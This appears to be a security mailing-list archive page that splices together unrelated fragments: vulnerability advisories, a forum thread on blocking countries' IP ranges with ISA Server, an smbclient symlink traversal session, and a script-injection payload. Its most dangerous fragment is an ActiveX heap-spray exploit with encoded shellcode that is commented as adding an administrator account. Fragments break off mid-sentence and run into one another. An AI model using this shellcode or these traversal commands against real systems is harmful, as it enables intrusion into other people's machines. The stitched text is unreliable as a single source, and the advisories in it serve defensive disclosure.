| New User, Welcome! Login |
Next Page >>
blocks
XSS Vulnerability in Drupal's Node Blocks contributed module (6.x-1.3
and 5.x-1.1)
Discovered by Martin Barbella <martybarbella@gmail.com>
Description of Vulnerability:
-----------------------------
Drupal is a free software package that allows an individual or a
community of users to easily publish, manage and organize a wide
variety of content on a website. (From: http://drupal.org/about)
as early as possible using our registration portal. As this is our
first conference, it would greatly help us in planning and logistics
(such as ordering badges) to have a more accurate idea of expected
attendance, which early registration will definitely help with. To
reward early registration, we have set up a tiered registration pricing
model. Each block of registrations is limited in quantity up to the
final block which is unlimited in quantity and will be available both
via the registration portal and on-site:
Block Price
Block 1 $110.00
Recently, David Litchfield asked me to help him out a bit with a research project he was working on by having me set up a network capture in my DMZ to log SQL Slammer attacks. I don't publish any services here at my Santa Cruz facility (meaning there are no required inbound protocols and no references in DNS anywhere) so I figured it would be nice "quiet" circuit to use for testing. I basically port-forwarded UDP 1434 to a laptop in my DMZ running NetMon3 also filtering for UDP 1434. After about 4 days of running NetMon, I had captured almost 30 (verified) random SQL Slammer attacks. What I found interesting was that every single one of them was sourced in China (all from different addresses).
Now, it's not my intent to start some geopolitical debate here, but I've long heard about how some people would block entire countries at the border in order to obviate issues with malicious traffic. There are obviously some issues with this (both from a technical and potential customer standpoint) so I set out to do a bit of research on my own. First thing I found out was that if one does decide to block entire countries, that it's going to be a bit of work from a rule standpoint. Sure, if I wanted to block all of China I could block APNIC, but that would block WAY more than I would want. So I set about finding a good resource for country-by-country IP ranges. Fortunately, Wade Alcorn, one of my colleagues at NGSSoftware turned me on to one that seemed pretty decent (there are a few around, though). But finding the resource was just the beginning... The list I got included 234 countries, comprised by almost 100,000 records of IP ranges.
Making a firewall rule to block China, for instance, would require entering in almost 600 IP ranges - so the "manual" route was clearly out. The thing is, I just didn't want to block countries without more research, so I needed a way to gather some statistics first. Enter ISA Server - as many of you know, I'm a big fan of ISA - it's a true enterprise security product with great scripting capabilities, so I set to work creating an automated method by which to create computer sets in ISA for each country. Basically, I created a SQL database and loaded all the records into it - I then wrote a little COM app to reach out and grab the data by countries, create the sets in ISA, and loop through the different ranges of IP's to add them to the set. It worked great.
This accomplished two things - one, I now have full detailed computer sets for each country to do with as I please. Secondly, I have an excellent way of producing detailed reports for traffic analysis in ISA- this was key. With data collection points set up at different places around the world, I was able to capture 3.1 million inbound connection attempts. The results were quite interesting. While China still led with connection attempts overall, it was interesting to see that Canada was a close second. However, while China's traffic consisted of SQL Slammer, HTTP, SMTP, probes for GhostProxy, etc, almost all of Canada's traffic was MESSENGER spam (UDP 1026,1027,1208). The world leader for HTTP was Brazil, strangely enough. Now, all of this will change based on who and where you are, and the types of services being offered. For example, I only got 5 SMTP connection attempts to my cable modem in a week, but my ISP in BM got hundreds of thousands (understandably) in the same time period. I'll whip up some cool reports for what I found and post them once I get some more data in from different collection points, but the valuable outcome of the project was the creation of these individual country-by-country Computer Sets for ISA.
Beforehand, I had no real way of easily and effectively reporting on traffic patterns by source country. Whether you can or can't block entire countries is your business, but at least this affords someone an easy way of doing research. You may not be able to (or even want) to block HTTP from China, but you very well may want to block SMTP - with ISA and computer sets, you can easily do this. Even if you don't block anything at all, you can use the sets to get rich reports of what kind of traffic your are getting from a particular country. While the validity of the practice of blocking entire countries (or particular protocols for that matter) may be up for debate, you now at least have the option to make your own decision based on factual information - to be sure, you've always been able to do this obviously, it's just been my experience that maintaining rule lists by country/protocol has been quite difficult and time consuming.
I've exported every countries entire list to ISA 2006 .XML format, and have posted them on the HoG site for community use. Since I've automated the Set creation process, I'll be updating the sets each month or so to ensure that changes are processed correctly. I would like to thank NGSSoftware for purchasing the required business services to receive the updates - their donation makes it possible for me to give you updated sets for free.
Technical Details:
The vulnerabilities in the .FLAC format are due to improperly handling
metadata values from malformed files. The file format is available here:
http://flac.sourceforge.net/format.html.
Vulnerability #1: Metadata Block Size Heap Overflow
The first notable vulnerability is the Metadata Block Size Overflow
vulnerability. Editing any Metadata Block Size value to a large value
such as 0xFFFFFFFF may result in a heap based overflow in the decoding
software.
Whenever vulnerable software open or process a malformed FLAC file, they
. D 0 Wed Feb 3 14:27:03 2010
.. D 0 Wed Feb 3 14:19:13 2010
test D 0 Wed Feb 3 14:19:13 2010
xxx A 1955 Wed Feb 3 14:22:42 2010
45503 blocks of size 2097152. 24437 blocks available
smb: \> symlink ../../../../../ foobar
smb: \> ls
. D 0 Wed Feb 3 14:27:47 2010
.. D 0 Wed Feb 3 14:19:13 2010
xxx A 1955 Wed Feb 3 14:22:42 2010
I've used Tim's block sets for awhile in my own FOAD rule, but I ended up having to adjust the policy because of the toolsets I provide to the folks that are trying to do a good day's work in those same locations.
Yes; there are plenty of good folks, computers and networks in China and other countries, but the sad fact is these countries also represent the network-sources (even if, as has been stated; not the "true" source) of the majority of attacks. My own firewall logs validate this.
How you use the lists Tim provides is a matter of personal choice according to your capabilities and priorities. If your firewall is smart enough to ignore anyone trying to bash your network or play silly buggers in the upper layers, then you may feel that an IP-based block set is overkill. If, like so many your firewall operates primarily at L4 and below, this data may prove very valuable.
Frankly, I like that someone has taken the time to do the numbers and produce the data; even if I can't use it the way I'd prefer.
Jim
<object classid='clsid:7C3B01BC-53A5-48A0-A43B-0C67731134B9' id='IMWebControl' /></object>
<SCRIPT language="javascript">
//add su one, user: sun pass: tzu
shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377%u7053%u
426d%u6444%u756e%u5235%u3058%u6165%u4630%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741%u7734%u4734%u4570");
bigblock = unescape("%u9090%u9090");
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
Devices running affected versions of Cisco IOS Software and Cisco IOS
XE Software are affected when configured to use any of the following
features within Cisco IOS:
* Airline Product Set (ALPS)
* Serial Tunnel Code (STUN) and Block Serial Tunnel Code (BSTUN)
* Native Client Interface Architecture support (NCIA)
* Data-link switching (DLSw)
* Remote Source-Route Bridging (RSRB)
* Point to Point Tunneling Protocol (PPTP)
* X.25 for Record Boundary Preservation (RBP)
exploited remotely and causes corruption of kernel memory, which leads
to a Windows stop error (blue screen) or to arbitrary code execution.
The vulnerability is triggered during processing of a crafted TCP
segment destined to TCP port 139 or 445. These ports are used by the
Microsoft Server Message Block (SMB) protocol.
Cisco has released free software updates that address this
vulnerability.
Common Vulnerabilities and Exposures (CVE) identifier CVE-2007-5580 has
<sarcasm tagfor=oblivoious>
Yeh, but what if I want you to justify your decisions in the context of my perceptions?
You don't find it reasonable that because you wish to share your efforts for free that they should serve my needs as well?
</sarcasm>
For the record, I tried Tim's blocklists and because I use an external spam-catcher and therefore accept mail only from them or specific hosts, I can statistically validate the statement that the sources of SMTP connection attempts that ignore my MX record are coming from a large percentage of the IPs Tim assembled, with the majority coming from east Asia (China & Korea being the most active).
It's a fair bet that any SMTP connection attempts that fail to agree with your MX record are "less than trustworthy".
Jim
exit(1);
}
static void write_loop(int fd, char *buf, int count)
{
int offset, block;
offset = 0;
while (count > 0) {
block = write(fd, &buf[offset], count);
if (block < 0) pexit("write");
traffic, qualifying what is or isn't malicious, and then taking whatever
action you feel is appropriate.
If there is no reason (business, personal, or otherwise) for traffic
from the US or the UK to be reaching your network, then by all means
block all of it if that is what you choose to do. If you re-read my
post, you'll see that the purpose for the sets is for people to make
*educated* decisions regarding what they may choose to block and from
where. In my case (and cases where colleagues tested this) blocking all
SMTP from China resulted in a dramatic (not just "noticeable") reduction
in overall SPAM. In the case of the site that I own (HoG) I decided to
checksum with DES session keys for version 2 (RFC 4121) of the GSS-API
krb5 mechanism.
MIT krb5 (releases krb5-1.7 and newer) incorrectly accepts an unkeyed
checksum for PAC signatures. Running exclusively krb5-1.8 or newer
KDCs blocks the attack.
MIT krb5 KDC (releases krb5-1.7 and newer) incorrectly accepts RFC
3961 key-derivation checksums using RC4 keys when verifying the
req-checksum in a KrbFastArmoredReq.
Inline:
> Subject: Re: All China, All The Time
> The solution of blocking China, however, is one which harms both people
> outside of China, as well as those inside of China. Therefore, it
> translates into an attack on them.
>
> Looking it this operationally:
>
Title: Multiple vulnerabilities in
SUPERAntiSpyware and Super Ad Blocker
Date of Discovery: 2 Feb 2010
Contact Date: 4 Feb.2010
Release Date: 10 Mar 2010
Author: Luka Milkovic
Mail: milkovic.luka at gmail.com
Software Link: SUPERAntiSpyware -
http://www.superantispyware.com/index.html
Super Ad Blocker -
4) of the OSI reference model. Among the services TCP provides are
stream data transfer, reliability, efficient flow control, full-duplex
operation, and multiplexing.
When TCP connections are terminated in Cisco IOS Software, they are
allocated a transmission control block (TCB). All allocated TCBs,
associated TCP port numbers, and the TCP state are displayed in the
output of the "show tcp brief all" command-line interface (CLI) command.
Cisco IOS Software version 15.1(2)T contains a vulnerability that could
cause an embryonic TCP connection to remain in SYNRCVD or SYNSENT
malformed record value. An attacker who successfully exploited this
vulnerability could execute arbitrary code with the privileges of the
user running the MS Word application.
More specifically, a Word file with a specially crafted 'lcbPlcfBkfSdt'
field value (offset '0x4f0') inside the File Information Block (FIB) can
corrupt the heap structure on vulnerable Word versions and enable an
arbitrary free with controlled values.
4. *Vulnerable packages*
* On UNIX systems, run Cascade Server in a chroot environment.
EXPLOIT
=======
This exploit example assumes the ability to create and edit blocks,
stylesheets, and pages. It's also possible to exploit the
vulnerability simply by modifying an existing stylesheet.
Create a stylesheet with the following contents:
/-----------
SilcBool silc_pkcs1_decode(SilcPkcs1BlockType bt,
const unsigned char *data,
SilcUInt32 data_len,
unsigned char *dest_data,
SilcUInt32 dest_data_size,
SilcUInt32 *dest_len)
- Security Research & Defense blog: [4] MS10-045: Microsoft Office
Outlook Remote Code Execution vulnerability
- KB978212 [5] MS10-045: Vulnerability in Microsoft Office Outlook could
allow remote code execution
- KB2271150 [6] You cannot open linked file attachments in Outlook:
"Outlook blocked access to the following potentially unsafe
attachments"
- SSD: [7] SecuriTeam Secure Disclosure program
------------------------------------------------------------------------
Tested version
ArpON (Arp handler inspectiON) is a portable handler daemon that make Arp secure in order to avoid Arp Spoofing/Poisoning & co.
This is possible using two kinds of anti Arp Poisoning tecniques, the first is based on SARPI or "Static Arp Inspection", the second on DARPI or"Dynamic Arp Inspection" approach.
Features:
- It replaces Arpwatch & co; ArpON blocks;
- It detects and blocks Arp Poisoning/Spoofing attacks in statically configured networks;
- It detects and blocks Arp Poisoning/Spoofing attacks in dinamically configured (DHCP) networks;
- It detects and blocks unidirectional and bidirectional attacks;
- It manages the network interface into unplug, boot, hibernation and suspension OS features;
- Easily configurable via command line switches, provided that you have root permissions;
"Like all security mitigation and protection technologies, the XSS Filter's
approach does have limitations, being that it is a pragmatic balance
between application compatibility, security, and performance.
Some examples:
* Injection into some contexts is not blocked. Ex: Scenarios where content
can be injected directly into JavaScript without breaking out of a string.
* Injections facilitated by some HTTP headers are not currently blocked.
Ex: "Referer" based injection.
left`` style=``width: 500px; border: 1px solid rgb(177, 192,
240);``><input type=``hidden`` value=``pserver``
name=``frm_o_o[0][class]``/>
<input type=``hidden`` value=``localhost`` name=``frm_o_o[0][nname]``/>
<div align=``left`` style=``padding: 10px; background-color: rgb(250,
248, 248); display: block;``> Command <br/>
... or
<input width=``60%`` type=``text`` value=``
name=``frm_pserver_c_ccenter_command``
class=``frm_pserver_c_ccenter_command textbox``/>
<iframe size=``30`` <``=`` [PERSISTENT SCRIPT CODE INJECT!]` src=``a``>
of available packet buffers may decrease when a security appliance
receives IPv6 traffic and is not configured for IPv6 operation. IPv6
transit traffic does not cause a problem.
Administrators can check packet buffer utilization by issuing the
command "show blocks" and inspecting the output for the number of
available 1,550-byte blocks. If the number of blocks is zero (indicated
by 0 in the CNT column), then the security appliance may be experiencing
this issue. For example:
ciscoasa# show blocks
companies).
Another possible attack is to find a web proxy in the internet that
allows SSL connection(there are several of them in Google!). This way,
the attacker will access the normal sites (port 80) through this web
proxy and the web proxy through Squid.
McAfee Web Gateway blocks several of this web proxies in regular
configuration. But the appliance is vulnerable to the attacks
mentioned.
One radical method is to block any connection with just the IP
address. Force the user to use DNS hostnames. I do not know if it is
practical, but it will stop the attack.
- Contact : Guns[at]0x90[dot]com[dot]ar
-
- Problem : Cross Site Request Forgery Vulnerability
-
- Sumary : sBlog has, by default, no CSRF protection, this may allow an attacker
to change any block by tricking a victim with admin privileges
into a special forged web page (even in a a totally different server)
that sends a request to change one block in the web. The
victim does not know that the form was sent. If the victim has admin
privileges the exploit will succeed, otherwise nothing will happen.
-
Analysis:
Details for TLS record handling vulnerability in GnuTLS [MU-201202-01]:
The block cipher decryption logic in GnuTLS assumed that a record containing
any data which was a multiple of the block size was valid for further
decryption processing, leading to a heap corruption vulnerability.
The bug can be reproduced in GnuTLS 3.0.14 by creating a corrupt
GenericBlockCipher struct with a valid IV, while everything else is stripped
On Mon, Jan 14, 2008 at 02:20:50PM -0800, Thor (Hammer of God) wrote:
[...]
> First thing I found out was that if one does decide to block
> entire countries, that it's going to be a bit of work from a rule
> standpoint.
Not at all, if you have the ability to integrate DNS lookups into
your filtering process (coupled with a DNS cache running locally on
the firewall, this should not be particularly demanding on your
resources). This problem has already been solved by people wanting
functionality, both filtering and reporting, directly on the box, and is
far more efficient in my opinion... But, it's a great point and I'm glad
you shared that.
>
> > Sure, if I wanted to block all of China I could block APNIC, but
> > that would block WAY more than I would want.
> [...]
>
> In my professional life, I see frequent requests of this nature from
> customers in western/English-speaking countries. My immediate
* PowerPoint XP SP3
PowerPoint 2003 SP2 and SP3 contain the vulnerable code, but by default
are unable to open PowerPoint 4.2 formatted files. This is due to the
Office 2003 SP2/SP3 File Block Policy, which limits the file formats
that Office applications will open without special permissions. If the
targeted user has disabled the File Block Policy settings in PowerPoint
2003 SP3, then they are vulnerable. However, this is a non-default
configuration. More on this policy can be found at the following URL.
Next Page>>
|
|
|
